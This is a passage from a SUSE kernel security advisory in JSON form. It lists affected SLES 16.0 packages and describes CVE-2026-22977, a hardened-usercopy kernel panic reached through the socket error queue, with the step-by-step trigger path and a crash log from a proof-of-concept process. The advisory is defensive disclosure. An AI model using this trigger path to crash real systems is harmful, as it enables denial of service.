"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
